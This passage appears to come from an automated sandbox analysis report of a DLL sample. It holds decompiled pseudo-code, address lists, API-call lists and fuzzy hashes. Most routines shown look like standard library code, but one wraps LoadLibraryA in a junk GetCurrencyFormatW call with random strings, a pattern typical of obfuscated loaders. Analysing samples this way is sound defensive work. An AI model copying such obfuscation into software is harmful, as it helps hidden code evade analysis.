				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x10039fd0;
					_v28 =  *0x10039fc8;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                                                            0x1002bdd6
                                                                                                            0x1002bdde
                                                                                                            0x1002bdf5
                                                                                                            0x1002bda1
                                                                                                            0x1002bdaa
                                                                                                            0x1002bdb6
                                                                                                            0x1002bdb9
                                                                                                            0x1002bdbc
                                                                                                            0x1002bdbe
                                                                                                            0x1002bdc1
                                                                                                            0x1002bdc6
                                                                                                            0x1002bdd0
                                                                                                            0x1002bdc8
                                                                                                            0x1002bdcc
                                                                                                            0x1002bdcc
                                                                                                            0x1002bde0
                                                                                                            0x1002bde6
                                                                                                            0x1002bdee
                                                                                                            0x00000000
                                                                                                            0x1002bdf0
                                                                                                            0x1002bdf0
                                                                                                            0x1002bdf4
                                                                                                            0x1002bdf4
                                                                                                            0x1002bdee

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,1002361A), ref: 1002BDD6
                                                                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1002BDE6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                            • API String ID: 1646373207-3105848591
                                                                                                            • Opcode ID: 28f514ccd754736609f33c51daedfd0aeac528797be2892e988ff456b478d1a6
                                                                                                            • Instruction ID: e32e5489c0f8680f0bdbeaaa6a49d62586903b2bdf2b5a8f28566646894aba65
                                                                                                            • Opcode Fuzzy Hash: 28f514ccd754736609f33c51daedfd0aeac528797be2892e988ff456b478d1a6
                                                                                                            • Instruction Fuzzy Hash: 94F03A20A00E1ADAEF01ABA1AD492EF7BB8FB84746F9245A0D592E4099EF318074D251
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10003057 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10003057(CHAR* _a4) {
				signed int _t2;

				_t2 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
				return  &((LoadLibraryA(_a4))[_t2 *  *0x100440d0]);
			}




                                                                                                            0x10003070
                                                                                                            0x1000308f

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003070
                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 10003086
                                                                                                            Strings
                                                                                                            • eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10003064
                                                                                                            • xadqsavcbdfewescGADW, xrefs: 1000305D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormatLibraryLoad
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 1566795320-3161301136
                                                                                                            • Opcode ID: b688c3496de217a7e3c91dcb6abf11db8e2619d95133c7353a921a1f77c43571
                                                                                                            • Instruction ID: c8b8bc68fb586c21cf620b45a97a61bfa4732d23f622789b4932f32e46aada1a
                                                                                                            • Opcode Fuzzy Hash: b688c3496de217a7e3c91dcb6abf11db8e2619d95133c7353a921a1f77c43571
                                                                                                            • Instruction Fuzzy Hash: 37D05E32644230BAE2125790AD4AFC2AB14E75A752F028004FB04FD5E1C36004A08EA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10018DA4 Relevance: 6.3, APIs: 4, Instructions: 309memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 80%
                                                                                                            			E10018DA4(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16, char _a20, signed int _a44, signed int _a48, signed int _a52, intOrPtr _a56, signed int _a60, intOrPtr _a64, char _a68, intOrPtr _a92, signed int _a96, signed int _a100, intOrPtr _a104, signed int _a108, intOrPtr _a112, signed int _a116, char _a120) {
				signed int _v4;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				void* _v40;
				char _v124;
				char _v168;
				char _v176;
				char _v184;
				intOrPtr _v196;
				signed int* __ebp;
				signed int _t132;
				signed int _t138;
				signed int _t139;
				void* _t140;
				intOrPtr* _t145;
				intOrPtr* _t148;
				signed int _t149;
				signed int _t151;
				intOrPtr* _t152;
				void* _t154;
				intOrPtr* _t158;
				signed int _t163;
				intOrPtr _t164;
				intOrPtr* _t166;
				intOrPtr* _t168;
				void* _t179;
				intOrPtr _t182;
				signed int _t183;
				signed int _t185;
				signed int* _t186;
				void* _t187;
				intOrPtr* _t188;
				signed int _t202;
				signed int _t204;
				intOrPtr _t214;
				intOrPtr _t220;
				intOrPtr* _t222;
				intOrPtr _t223;
				signed int _t225;
				void* _t228;
				void* _t229;
				void* _t231;
				void* _t232;

				_t188 = __ecx;
				_t181 = __ebx;
				_t232 = _t231 - 0x74;
				_t225 =  &_v124;
				_t132 =  *0x10045580; // 0x6a53a566
				_a116 = _t132 ^ _t225;
				_push(0x1c);
				E1001FBC4(E100344DD, __ebx, __edi, __esi);
				_t222 = __ecx;
				_v16 =  *((intOrPtr*)(__ecx + 0x14));
				_a4 =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t138 =  *(__ecx + 8);
					__eflags = _t138;
					if(_t138 != 0) {
						_t215 =  &_a12;
						_t139 =  *((intOrPtr*)( *_t138 + 0xc))(_t138, 0x1003b18c,  &_a12,  &_a8);
						__eflags = _t139;
						if(_t139 >= 0) {
							E100157C0( &_a12,  &_a20, 0x1003b8b8);
							_a52 = _a52 | 0xffffffff;
							_a44 = 0;
							_a48 = 0;
							_a56 = 0x18;
							_a60 = 0;
							_a64 = 0x1fb;
							E100157C0( &_a12,  &_a68, 0x1003b8a0);
							_t145 = _a12;
							_a100 = _a100 | 0xffffffff;
							_t215 =  &_a20;
							_a92 = 0x1c;
							_a96 = 0;
							_a104 = 0x20;
							_a108 = 0;
							_a112 = 0x1e;
							_t183 =  *((intOrPtr*)( *_t145 + 0x10))(_t145, 2,  &_a20, 0x28, 0);
							__eflags = _t183;
							if(_t183 >= 0) {
								_t215 = 0;
								_v40 = _a8;
								_t148 = _a12;
								_v36 = 1;
								_v32 = 0;
								_v28 = 0;
								_v24 = 0;
								_t149 =  *((intOrPtr*)( *_t148 + 0x18))(_t148, 0, 0,  &_v40);
								__eflags = _t149;
								 *_t225 = _t149;
								if(_t149 >= 0) {
									 *((intOrPtr*)(_t222 + 0x14)) = _v32;
									_t151 = _v20;
									_a8 = _t151;
									 *(_t222 + 0x10) = _t151;
									_t152 = _a12;
									 *((intOrPtr*)(_t222 + 0x34)) = _v28;
									 *((intOrPtr*)( *_t152 + 8))(_t152);
									goto L32;
								} else {
									_t166 = _a12;
									 *((intOrPtr*)( *_t166 + 8))(_t166);
								}
								goto L50;
							} else {
								_t168 = _a12;
								 *((intOrPtr*)( *_t168 + 8))(_t168);
								_t139 = _t183;
							}
						}
					} else {
						_t139 = 0;
					}
					goto L51;
				} else {
					__eax =  *(__esi + 0x4c);
					__ecx =  *__eax;
					__edx =  &_a16;
					__eax =  *((intOrPtr*)(__ecx + 0x14))(__eax, 0x1003b39c, __edx);
					__eflags = __eax;
					 *__ebp = __eax;
					if(__eax < 0) {
						L51:
						 *[fs:0x0] = _v12;
						_pop(_t220);
						_pop(_t223);
						_pop(_t182);
						_t140 = E1001FBB5(_t139, _t182, _a116 ^ _t225, _t215, _t220, _t223);
						__eflags =  &_a120;
						return _t140;
					} else {
						__eax = _a16;
						__ecx =  *__eax;
						__edx =  &_a8;
						_push( &_a8);
						_push(0x1003b37c);
						_push(__eax);
						__eflags = __eax;
						if(__eflags >= 0) {
							__eax = _a8;
							__edx =  &_a12;
							_push( &_a12);
							_push(0x1003b4bc);
							_a12 = 0;
							__ecx =  *__eax;
							_push(__eax);
							__eflags = __eax;
							if(__eflags >= 0) {
								__eax = _a12;
								__ecx =  *__eax;
								__edx = __esi + 0x58;
								__edx =  *(__esi + 4);
								__edx =  *(__esi + 4) + 0xe8;
								__eflags = __edx;
								__eax =  *((intOrPtr*)( *__eax + 0x14))(__eax, __edx, __esi + 0x58);
								__eax = _a12;
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
							}
							__eax = _a8;
							__ecx =  *__eax;
							__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						}
						__eax = E10004D4A(__eflags, 0x14);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E100185F7(__eax, _a16);
						}
						 *(__esi + 0x50) = __eax;
						__eax = _a16;
						__ecx =  *__eax;
						__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						__eax =  *(__esi + 0x50);
						__ecx =  *__eax;
						__eflags =  *__eax - __edi;
						if(__eflags != 0) {
							__eflags = __eax;
							__eax = E100159E9(__ecx, __eax);
						}
						__eax = E10004D4A(__eflags, 0x28);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E10014659(__eax, __edi, 0x1f40);
						}
						__edx =  *(__esi + 0x50);
						 *(__esi + 0x54) = __eax;
						_push( *( *(__esi + 0x50)));
						__ecx = __eax;
						__eax =  *(__esi + 0x54);
						__ecx =  *(__esi + 0x50);
						 *(__ecx + 8) =  *(__esi + 0x54);
						__eax =  *(__esi + 0x54);
						__eax =  *( *(__esi + 0x54) + 0xc);
						__eflags = __eax - 0x3333333;
						 *(__esi + 0x10) = __eax;
						if(__eax <= 0x3333333) {
							__eax = __eax * 0x28;
							__imp__CoTaskMemAlloc(__eax);
							__ecx = 0;
							__eflags = __eax - __edi;
							__ecx = 0 | __eflags != 0x00000000;
							 *(__esi + 0x14) = __eax;
							if(__eflags != 0) {
								 *(__esi + 0x10) =  *(__esi + 0x10) * 0x28;
								__eax = E10020F40(__edi, __eax, __edi,  *(__esi + 0x10) * 0x28);
								__ecx =  *(__esi + 0x50);
								__eax = E10018619( *(__esi + 0x50));
								__ecx =  *(__esi + 0x50);
								__eax = E100159A6(__ecx);
								L32:
								__eflags =  *(_t222 + 0x10);
								_a16 = 0;
								if( *(_t222 + 0x10) > 0) {
									_t187 = 0;
									__eflags = 0;
									do {
										_t163 = E10004D4A(__eflags, 0x1c);
										_a8 = _t163;
										__eflags = _t163;
										_v4 = 0;
										if(_t163 == 0) {
											_t164 = 0;
											__eflags = 0;
										} else {
											_t164 = E1001B8FB(_t163, 0xa);
										}
										_v4 = _v4 | 0xffffffff;
										_a16 = _a16 + 1;
										 *((intOrPtr*)(_t187 +  *((intOrPtr*)(_t222 + 0x14)) + 0x24)) = _t164;
										_t187 = _t187 + 0x28;
										__eflags = _a16 -  *(_t222 + 0x10);
									} while (__eflags < 0);
								}
								_t185 = _v16;
								__eflags = _t185;
								if(_t185 != 0) {
									__eflags = _a4;
									if(_a4 > 0) {
										_t154 = 0xffffffdc;
										_t186 = _t185 + 0x24;
										_a16 = _a4;
										_a8 = _t154 - _v16;
										while(1) {
											_t202 =  *( *_t186 + 4);
											__eflags = _t202;
											_a4 = _t202;
											if(_t202 == 0) {
												goto L46;
											}
											while(1) {
												_t158 = E1000911A( &_a4);
												_t215 =  *_t222;
												 *((intOrPtr*)( *_t222 + 8))( *_t158, 1);
												__eflags = _a4;
												if(_a4 == 0) {
													goto L46;
												}
											}
											L46:
											E1001B823( *_t186);
											_t204 =  *_t186;
											__eflags = _t204;
											if(_t204 != 0) {
												 *((intOrPtr*)( *_t204 + 4))(1);
											}
											_t186 =  &(_t186[0xa]);
											_t127 =  &_a16;
											 *_t127 = _a16 - 1;
											__eflags =  *_t127;
											if( *_t127 != 0) {
												continue;
											}
											goto L49;
										}
									}
									L49:
									__imp__CoTaskMemFree(_v16);
								}
								L50:
								_t139 =  *_t225;
								goto L51;
							} else {
								_push(_t225);
								_t228 = _t232;
								_push(_t188);
								_v168 = 0x100442e0;
								E100209E8( &_v168, 0x1003e1e4);
								asm("int3");
								_push(_t228);
								_t229 = _t232;
								_push(_t188);
								_v176 = 0x10044378;
								E100209E8( &_v176, 0x1003e298);
								asm("int3");
								_push(_t229);
								_push(_t188);
								_v184 = 0x10044410;
								E100209E8( &_v184, 0x1003e2dc);
								asm("int3");
								_push(4);
								E1001FBC4(E10032E9B, _t181, 0, _t222);
								_t214 = E100105C8(0x104);
								_v196 = _t214;
								_t179 = 0;
								_v184 = 0;
								if(_t214 != 0) {
									_t179 = E1000E58E(_t214);
								}
								return E1001FC9C(_t179);
							}
						} else {
							__eax = 0x8007000e;
							goto L51;
						}
					}
				}
			}



















































                                                                                                            0x10018da4
                                                                                                            0x10018da4
                                                                                                            0x10018da5
                                                                                                            0x10018da8
                                                                                                            0x10018dac
                                                                                                            0x10018db3
                                                                                                            0x10018db6
                                                                                                            0x10018dbd
                                                                                                            0x10018dc2
                                                                                                            0x10018dc7
                                                                                                            0x10018dd2
                                                                                                            0x10018dd5
                                                                                                            0x10018f1a
                                                                                                            0x10018f1d
                                                                                                            0x10018f1f
                                                                                                            0x10018f2e
                                                                                                            0x10018f38
                                                                                                            0x10018f3b
                                                                                                            0x10018f3d
                                                                                                            0x10018f4e
                                                                                                            0x10018f53
                                                                                                            0x10018f62
                                                                                                            0x10018f65
                                                                                                            0x10018f68
                                                                                                            0x10018f6f
                                                                                                            0x10018f72
                                                                                                            0x10018f79
                                                                                                            0x10018f7e
                                                                                                            0x10018f81
                                                                                                            0x10018f88
                                                                                                            0x10018f8e
                                                                                                            0x10018f95
                                                                                                            0x10018f98
                                                                                                            0x10018f9f
                                                                                                            0x10018fa2
                                                                                                            0x10018faf
                                                                                                            0x10018fb1
                                                                                                            0x10018fb3
                                                                                                            0x10018fcc
                                                                                                            0x10018fcf
                                                                                                            0x10018fd2
                                                                                                            0x10018fd8
                                                                                                            0x10018fdf
                                                                                                            0x10018fe2
                                                                                                            0x10018fe5
                                                                                                            0x10018feb
                                                                                                            0x10018fee
                                                                                                            0x10018ff0
                                                                                                            0x10018ff3
                                                                                                            0x10019009
                                                                                                            0x1001900c
                                                                                                            0x1001900f
                                                                                                            0x10019012
                                                                                                            0x10019015
                                                                                                            0x10019018
                                                                                                            0x1001901e
                                                                                                            0x00000000
                                                                                                            0x10018ff5
                                                                                                            0x10018ff5
                                                                                                            0x10018ffb
                                                                                                            0x10018ffb
                                                                                                            0x00000000
                                                                                                            0x10018fb5
                                                                                                            0x10018fb5
                                                                                                            0x10018fbb
                                                                                                            0x10018fbe
                                                                                                            0x10018fbe
                                                                                                            0x10018fb3
                                                                                                            0x10018f21
                                                                                                            0x10018f21
                                                                                                            0x10018f21
                                                                                                            0x00000000
                                                                                                            0x10018ddb
                                                                                                            0x10018ddb
                                                                                                            0x10018dde
                                                                                                            0x10018de0
                                                                                                            0x10018dea
                                                                                                            0x10018ded
                                                                                                            0x10018def
                                                                                                            0x10018df2
                                                                                                            0x100190e2
                                                                                                            0x100190e5
                                                                                                            0x100190ed
                                                                                                            0x100190ee
                                                                                                            0x100190ef
                                                                                                            0x100190f5
                                                                                                            0x100190fa
                                                                                                            0x100190fe
                                                                                                            0x10018df8
                                                                                                            0x10018df8
                                                                                                            0x10018dfb
                                                                                                            0x10018dfd
                                                                                                            0x10018e00
                                                                                                            0x10018e01
                                                                                                            0x10018e06
                                                                                                            0x10018e09
                                                                                                            0x10018e0b
                                                                                                            0x10018e0d
                                                                                                            0x10018e10
                                                                                                            0x10018e13
                                                                                                            0x10018e14
                                                                                                            0x10018e19
                                                                                                            0x10018e1c
                                                                                                            0x10018e1e
                                                                                                            0x10018e22
                                                                                                            0x10018e24
                                                                                                            0x10018e26
                                                                                                            0x10018e29
                                                                                                            0x10018e2b
                                                                                                            0x10018e2f
                                                                                                            0x10018e32
                                                                                                            0x10018e32
                                                                                                            0x10018e3a
                                                                                                            0x10018e3d
                                                                                                            0x10018e40
                                                                                                            0x10018e43
                                                                                                            0x10018e43
                                                                                                            0x10018e46
                                                                                                            0x10018e49
                                                                                                            0x10018e4c
                                                                                                            0x10018e4c
                                                                                                            0x10018e51
                                                                                                            0x10018e56
                                                                                                            0x10018e59
                                                                                                            0x10018e67
                                                                                                            0x10018e67
                                                                                                            0x10018e5b
                                                                                                            0x10018e5e
                                                                                                            0x10018e60
                                                                                                            0x10018e60
                                                                                                            0x10018e69
                                                                                                            0x10018e6c
                                                                                                            0x10018e6f
                                                                                                            0x10018e72
                                                                                                            0x10018e75
                                                                                                            0x10018e78
                                                                                                            0x10018e7a
                                                                                                            0x10018e7c
                                                                                                            0x10018e7e
                                                                                                            0x10018e83
                                                                                                            0x10018e83
                                                                                                            0x10018e8a
                                                                                                            0x10018e8f
                                                                                                            0x10018e92
                                                                                                            0x10018ea3
                                                                                                            0x10018ea3
                                                                                                            0x10018e94
                                                                                                            0x10018e9a
                                                                                                            0x10018e9c
                                                                                                            0x10018e9c
                                                                                                            0x10018ea5
                                                                                                            0x10018ea8
                                                                                                            0x10018eab
                                                                                                            0x10018ead
                                                                                                            0x10018eb4
                                                                                                            0x10018eb7
                                                                                                            0x10018eba
                                                                                                            0x10018ebd
                                                                                                            0x10018ec0
                                                                                                            0x10018ec3
                                                                                                            0x10018ec8
                                                                                                            0x10018ecb
                                                                                                            0x10018ed7
                                                                                                            0x10018edb
                                                                                                            0x10018ee1
                                                                                                            0x10018ee3
                                                                                                            0x10018ee5
                                                                                                            0x10018ee8
                                                                                                            0x10018eed
                                                                                                            0x10018ef7
                                                                                                            0x10018efd
                                                                                                            0x10018f02
                                                                                                            0x10018f08
                                                                                                            0x10018f0d
                                                                                                            0x10018f10
                                                                                                            0x10019021
                                                                                                            0x10019021
                                                                                                            0x10019024
                                                                                                            0x10019027
                                                                                                            0x10019029
                                                                                                            0x10019029
                                                                                                            0x1001902b
                                                                                                            0x1001902d
                                                                                                            0x10019033
                                                                                                            0x10019036
                                                                                                            0x10019038
                                                                                                            0x1001903b
                                                                                                            0x10019048
                                                                                                            0x10019048
                                                                                                            0x1001903d
                                                                                                            0x10019041
                                                                                                            0x10019041
                                                                                                            0x1001904a
                                                                                                            0x10019051
                                                                                                            0x10019054
                                                                                                            0x1001905b
                                                                                                            0x1001905e
                                                                                                            0x1001905e
                                                                                                            0x1001902b
                                                                                                            0x10019063
                                                                                                            0x10019066
                                                                                                            0x10019068
                                                                                                            0x1001906a
                                                                                                            0x1001906d
                                                                                                            0x10019074
                                                                                                            0x10019075
                                                                                                            0x1001907b
                                                                                                            0x1001907e
                                                                                                            0x10019086
                                                                                                            0x10019088
                                                                                                            0x1001908b
                                                                                                            0x1001908d
                                                                                                            0x10019090
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019097
                                                                                                            0x100190a4
                                                                                                            0x100190ab
                                                                                                            0x100190b2
                                                                                                            0x100190b5
                                                                                                            0x100190b8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019094
                                                                                                            0x100190ba
                                                                                                            0x100190bc
                                                                                                            0x100190c1
                                                                                                            0x100190c3
                                                                                                            0x100190c5
                                                                                                            0x100190cb
                                                                                                            0x100190cb
                                                                                                            0x100190ce
                                                                                                            0x100190d1
                                                                                                            0x100190d1
                                                                                                            0x100190d1
                                                                                                            0x100190d4
                                                                                                            0x00000000
                                                                                                            0x10019083
                                                                                                            0x00000000
                                                                                                            0x100190d4
                                                                                                            0x10019086
                                                                                                            0x100190d6
                                                                                                            0x100190d9
                                                                                                            0x100190d9
                                                                                                            0x100190df
                                                                                                            0x100190df
                                                                                                            0x00000000
                                                                                                            0x10018eef
                                                                                                            0x10004e3a
                                                                                                            0x10004e3b
                                                                                                            0x10004e3d
                                                                                                            0x10004e47
                                                                                                            0x10004e4e
                                                                                                            0x10004e53
                                                                                                            0x10004e54
                                                                                                            0x10004e55
                                                                                                            0x10004e57
                                                                                                            0x10004e61
                                                                                                            0x10004e68
                                                                                                            0x10004e6d
                                                                                                            0x10004e6e
                                                                                                            0x10004e71
                                                                                                            0x10004e7b
                                                                                                            0x10004e82
                                                                                                            0x10004e87
                                                                                                            0x10004e88
                                                                                                            0x10004e8f
                                                                                                            0x10004e9e
                                                                                                            0x10004ea0
                                                                                                            0x10004ea3
                                                                                                            0x10004ea7
                                                                                                            0x10004eaa
                                                                                                            0x10004eac
                                                                                                            0x10004eac
                                                                                                            0x10004eb6
                                                                                                            0x10004eb6
                                                                                                            0x10018ecd
                                                                                                            0x10018ecd
                                                                                                            0x00000000
                                                                                                            0x10018ecd
                                                                                                            0x10018ecb
                                                                                                            0x10018df2

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 10018DBD
                                                                                                            • CoTaskMemAlloc.OLE32(?,?), ref: 10018EDB
                                                                                                            • _memset.LIBCMT ref: 10018EFD
                                                                                                            • CoTaskMemFree.OLE32(?), ref: 100190D9
                                                                                                              • Part of subcall function 10004D4A: _malloc.LIBCMT ref: 10004D64
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 2459298410-0
                                                                                                            • Opcode ID: b121ae2c8e829696b65b9efb5c59cf0f74438459b6ac44388d9d562fa2d0b33e
                                                                                                            • Instruction ID: a1cdd10b8d3f28a5117ac55e09806983a961173fe6bfd8d1acb233a2e2c4c6df
                                                                                                            • Opcode Fuzzy Hash: b121ae2c8e829696b65b9efb5c59cf0f74438459b6ac44388d9d562fa2d0b33e
                                                                                                            • Instruction Fuzzy Hash: C9C106B4600709EFCB15CF68C88499AB7F5FF88704B20891AF956CF291DB71EA85CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10019C50 Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 70%
                                                                                                            			E10019C50(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr _t85;
				intOrPtr* _t86;
				intOrPtr _t101;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t145;
				intOrPtr* _t151;
				intOrPtr* _t160;
				intOrPtr _t161;
				intOrPtr _t162;
				void* _t163;
				void* _t164;
				intOrPtr _t166;
				intOrPtr* _t167;
				void* _t168;
				intOrPtr _t180;

				_push(0x10);
				E1001FBC4(E100345BC, __ebx, __edi, __esi);
				_t166 = __ecx;
				 *((intOrPtr*)(_t168 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1003892c;
				 *(_t168 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					L11:
					while( *((intOrPtr*)(_t166 + 0x24)) != 0) {
						_t160 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x1c)) + 8));
						__eflags = _t160;
						if(_t160 == 0) {
							break;
						}
						_t151 =  *_t160;
						__eflags = _t151;
						if(_t151 == 0) {
							break;
						}
						 *((intOrPtr*)( *_t151 + 0xbc))( *((intOrPtr*)(_t160 + 8)), 0);
						 *((intOrPtr*)( *_t160 + 0x98)) = 0;
					}
					 *((intOrPtr*)(_t168 - 0x18)) = _t166 + 0x18;
					E1001B823(_t166 + 0x18);
					if( *((intOrPtr*)(_t166 + 0x40)) == 0) {
						L19:
						_t83 =  *((intOrPtr*)(_t166 + 8));
						if(_t83 != 0) {
							 *((intOrPtr*)( *_t83 + 8))(_t83);
						}
						_t84 =  *((intOrPtr*)(_t166 + 0xc));
						if(_t84 != 0) {
							 *((intOrPtr*)( *_t84 + 8))(_t84);
						}
						if( *((intOrPtr*)(_t166 + 0x14)) == 0) {
							L32:
							_t85 =  *((intOrPtr*)(_t166 + 0x34));
							if(_t85 != 0) {
								__imp__CoTaskMemFree(_t85);
							}
							_t136 =  *((intOrPtr*)(_t166 + 0x54));
							if( *((intOrPtr*)(_t166 + 0x54)) != 0) {
								E10018664(_t136,  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x50)))));
								E10014682( *((intOrPtr*)(_t166 + 0x54)));
							}
							_t161 =  *((intOrPtr*)(_t166 + 0x54));
							_t192 = _t161;
							if(_t161 != 0) {
								E10014682(_t161);
								_push(_t161);
								E10004D75(0, _t161, _t166, _t192);
							}
							_t162 =  *((intOrPtr*)(_t166 + 0x50));
							_t193 = _t162;
							if(_t162 != 0) {
								E10019A2F(_t162, _t193);
								_push(_t162);
								E10004D75(0, _t162, _t166, _t193);
							}
							_t86 =  *((intOrPtr*)(_t166 + 0x4c));
							if(_t86 != 0) {
								 *((intOrPtr*)( *_t86 + 8))(_t86);
							}
							_t167 =  *((intOrPtr*)(_t166 + 0x48));
							if(_t167 != 0) {
								 *((intOrPtr*)( *_t167 + 8))(_t167);
							}
							 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
